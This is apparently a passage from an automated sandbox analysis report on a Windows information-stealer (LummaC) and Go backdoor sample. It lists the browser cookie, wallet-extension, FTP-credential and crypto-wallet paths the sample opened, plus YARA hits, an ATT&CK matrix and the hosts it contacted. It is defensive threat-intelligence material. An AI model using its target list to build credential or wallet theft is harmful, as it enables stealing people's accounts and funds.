                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\loinekcabhlmhjjbocijdoimmejangoaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchhJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkbihfbeogaeaoehlefnkodbefgpgknnJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfddJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jiidiaalihmmhddjgbnbgdfflelocpakJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjpJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpoJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgppJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\cookies.sqliteJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\ProfilesJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nngceckbapebfimnlniiiahkandclblbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ojggmchlghnjlapmfbnjholfjkiidbchJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ijmpgkjfkbfhoebgogflfebnmejmfbmJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\acmacodkjbdgmoleebolmdjonilkdbchJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\flpiciilemghbmfalicajoolhkkenfeJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nanjmdknhkinifnkgdcggcfnhdaammmjJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cjelfplplebdjjenllpjcblmjkfcffneJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\imloifkgjagghnncjkhggdhalmcnfklkJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jnlgamecbpmbajjfhmmmlhejkemejdmaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\opcgpfmipidbgpenhmajoajpbobppdilJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\blnieiiffboillknjnepogjhkgnoapacJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhmfendgdocmcbmfikdcogofphimnknoJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nkddgncdjgjfcddamfgcmfnlhccnimigJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fcfcfllfndlomdhbehjjcoimbgofdncgJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\gaedmjdfmmahhbjefcbgaolhhanlaolbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcobJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\phkbamefinggmakgklpkljjmgibohnbaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\oeljdldpnmdbchonielidgobddffflaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\amkmjjmmflddogmhpjloimipbofnfjihJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcgeJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\lodccjjbdhfakaekdiahmedfbieldgikJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nknhiehlklippafakaeklbeglecifhadJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\jgaaimajipbpdogpdglhaphldakikgefJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dlcobpjiigpikoobohmabehhmhfoodbbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bcopgchhojmggmffilplmbdicgaihlkpJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcelljJump to behavior
                  Tries to harvest and steal ftp login credentials
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPGetterJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPInfoJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\SmartFTP\Client 2.0\FavoritesJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPboxJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\FTPRushJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Conceptworld\NotezillaJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\ProgramData\SiteDesigner\3D-FTPJump to behavior
                  Tries to steal Crypto Currency Wallets
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Exodus\exodus.walletJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Ledger LiveJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\atomic\Local Storage\leveldbJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Local\Coinomi\Coinomi\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Bitcoin\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\BinanceJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\com.liberty.jaxx\IndexedDBJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Electrum-LTC\walletsJump to behavior
                  Source: C:\Users\user\Desktop\Set-up.exeFile opened: C:\Users\user\AppData\Roaming\Guarda\IndexedDBJump to behavior
                  Source: Yara matchFile source: 00000001.00000003.1951577261.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1898990474.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1872993829.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: 00000001.00000003.1873565102.000000000158F000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                  Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7820, type: MEMORYSTR

                  Remote Access Functionality

                  barindex
                  Yara detected GO Backdoor
                  Source: Yara matchFile source: Process Memory Space: K07BOQJSAWQXKEH8FTYNN.exe PID: 6964, type: MEMORYSTR
                  Yara detected LummaC Stealer
                  Source: Yara matchFile source: Process Memory Space: Set-up.exe PID: 7820, type: MEMORYSTR
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_007D6040 ?ClearListeners@ListenerManager@dvatransport@@QAEXXZ,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,?Dispose@SmallBlockAllocator@utility@dvacore@@YAXPAXI@Z,??3@YAXPAX@Z,12_2_007D6040
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_007EC170 ??4ListenerManager@dvatransport@@QAEAAV01@ABV01@@Z,12_2_007EC170
                  Source: C:\Users\user\AppData\Local\Temp\HL047ZZ4FG3J96B30TQFR3DUZDL9\Server.exeCode function: 12_2_007EC150 ??0ListenerManager@dvatransport@@QAE@ABV01@@Z,12_2_007EC150

                  Mitre Att&ck Matrix

                  ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                  Gather Victim Identity InformationAcquire InfrastructureValid Accounts12
                  Windows Management Instrumentation                  		11
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		1
                  Deobfuscate/Decode Files or Information                  		2
                  OS Credential Dumping                  		1
                  System Time Discovery                  		Remote Services1
                  Archive Collected Data                  		2
                  Ingress Tool Transfer                  		Exfiltration Over Other Network MediumAbuse Accessibility Features
                  CredentialsDomainsDefault Accounts2
                  Command and Scripting Interpreter                  		1
                  Scheduled Task/Job                  		11
                  DLL Side-Loading                  		1
                  Abuse Elevation Control Mechanism                  		LSASS Memory1
                  File and Directory Discovery                  		Remote Desktop Protocol4
                  Data from Local System                  		11
                  Encrypted Channel                  		Exfiltration Over BluetoothNetwork Denial of Service
                  Email AddressesDNS ServerDomain Accounts1
                  Scheduled Task/Job                  		1
                  Registry Run Keys / Startup Folder                  		411
                  Process Injection                  		3
                  Obfuscated Files or Information                  		Security Account Manager134
                  System Information Discovery                  		SMB/Windows Admin SharesData from Network Shared Drive1
                  Non-Standard Port                  		Automated ExfiltrationData Encrypted for Impact
                  Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                  Scheduled Task/Job                  		11
                  Software Packing                  		NTDS551
                  Security Software Discovery                  		Distributed Component Object ModelInput Capture3
                  Non-Application Layer Protocol                  		Traffic DuplicationData Destruction
                  Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script1
                  Registry Run Keys / Startup Folder                  		11
                  DLL Side-Loading                  		LSA Secrets22
                  Virtualization/Sandbox Evasion                  		SSHKeylogging14
                  Application Layer Protocol                  		Scheduled TransferData Encrypted for Impact
                  Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts11
                  Masquerading                  		Cached Domain Credentials1
                  Process Discovery                  		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                  DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items22
                  Virtualization/Sandbox Evasion                  		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                  Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job411
                  Process Injection                  		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement

                  Behavior Graph

                  Hide Legend

                  Legend:

                  • Process
                  • Signature
                  • Created File
                  • DNS/IP Info
                  • Is Dropped
                  • Is Windows Process
                  • Number of created Registry Values
                  • Number of created Files
                  • Visual Basic
                  • Delphi
                  • Java
                  • .Net C# or VB.NET
                  • C, C++ or other language
                  • Is malicious
                  • Internet
                  behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1635524 Sample: Set-up.exe Startdate: 11/03/2025 Architecture: WINDOWS Score: 100 61 a8a00b7a27dd309f6.awsglobalaccelerator.com 2->61 63 x.ss2.us 2->63 65 7 other IPs or domains 2->65 89 Malicious sample detected (through community Yara rule) 2->89 91 Antivirus detection for URL or domain 2->91 93 Antivirus detection for dropped file 2->93 95 8 other signatures 2->95 9 Set-up.exe 26 2->9         started        14 rareTemp.exe 2->14         started        16 Server.exe 2 2->16         started        18 2 other processes 2->18 signatures3 process4 dnsIp5 77 www.mediafire.com 104.17.151.117, 443, 49730 CLOUDFLARENETUS United States 9->77 79 ultra.mediafirecdn.com 104.18.36.145, 443, 49731 CLOUDFLARENETUS United States 9->79 87 2 other IPs or domains 9->87 51 C:\Users\user\...\K07BOQJSAWQXKEH8FTYNN.exe, PE32 9->51 dropped 53 C:\Users\user\AppData\...\svml_dispmd.dll, PE32 9->53 dropped 55 C:\Users\user\AppData\Local\...\msvcr100.dll, PE32 9->55 dropped 57 20 other malicious files 9->57 dropped 111 Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines) 9->111 113 Query firmware table information (likely to detect VMs) 9->113 115 Found many strings related to Crypto-Wallets (likely being stolen) 9->115 127 4 other signatures 9->127 20 Server.exe 25 9->20         started        24 K07BOQJSAWQXKEH8FTYNN.exe 1 2 9->24         started        81 185.21.13.144, 27085, 27435, 49746 ZEN-ASZenInternet-UKGB United Kingdom 14->81 83 193.187.172.163, 443, 49740, 49743 ITOS-ASRU Russian Federation 14->83 85 147.45.196.157, 443, 49739, 49742 FREE-NET-ASFREEnetEU Russian Federation 14->85 117 Antivirus detection for dropped file 14->117 119 Multi AV Scanner detection for dropped file 14->119 121 Detected unpacking (creates a PE file in dynamic memory) 14->121 123 Maps a DLL or memory area into another process 16->123 125 Found direct / indirect Syscall (likely to bypass EDR) 16->125 27 more.com 1 16->27         started        file6 signatures7 process8 dnsIp9 41 C:\Users\user\AppData\...\svml_dispmd.dll, PE32 20->41 dropped 43 C:\Users\user\AppData\...\msvcr100.dll, PE32 20->43 dropped 45 C:\Users\user\AppData\...\msvcp100.dll, PE32 20->45 dropped 49 18 other malicious files 20->49 dropped 101 Maps a DLL or memory area into another process 20->101 103 Switches to a custom stack to bypass stack traces 20->103 29 more.com 2 20->29         started        73 77.238.237.190, 12113, 49733 TELERU-ASRU Russian Federation 24->73 75 46.8.232.106, 443, 49732, 49738 FIORD-ASIP-transitoperatorinRussiaUkraineandBaltics Russian Federation 24->75 47 C:\Users\user\AppData\Local\...\rareTemp.exe, PE32 24->47 dropped 105 Antivirus detection for dropped file 24->105 107 Multi AV Scanner detection for dropped file 24->107 109 Detected unpacking (creates a PE file in dynamic memory) 24->109 33 conhost.exe 27->33         started        file10 signatures11 process12 file13 59 C:\Users\user\AppData\Local\...\ertyayyeqtcs, PE32 29->59 dropped 129 Injects code into the Windows Explorer (explorer.exe) 29->129 131 Writes to foreign memory regions 29->131 133 Found hidden mapped module (file has been removed from disk) 29->133 135 2 other signatures 29->135 35 explorer.exe 2 29->35         started        39 conhost.exe 29->39         started        signatures14 process15 dnsIp16 67 a8a00b7a27dd309f6.awsglobalaccelerator.com 15.197.198.189, 49734, 8545 TANDEMUS United States 35->67 69 62.60.234.80, 1466, 49737, 49744 ASLINE-AS-APASLINELIMITEDHK Iran (ISLAMIC Republic Of) 35->69 71 x.ss2.us 3.161.82.59, 49735, 80 AMAZON-02US United States 35->71 97 System process connects to network (likely due to code injection or exploit) 35->97 99 Switches to a custom stack to bypass stack traces 35->99 signatures17

                  Screenshots

                  Thumbnails

                  This section contains all screenshots as thumbnails, including those not shown in the slideshow.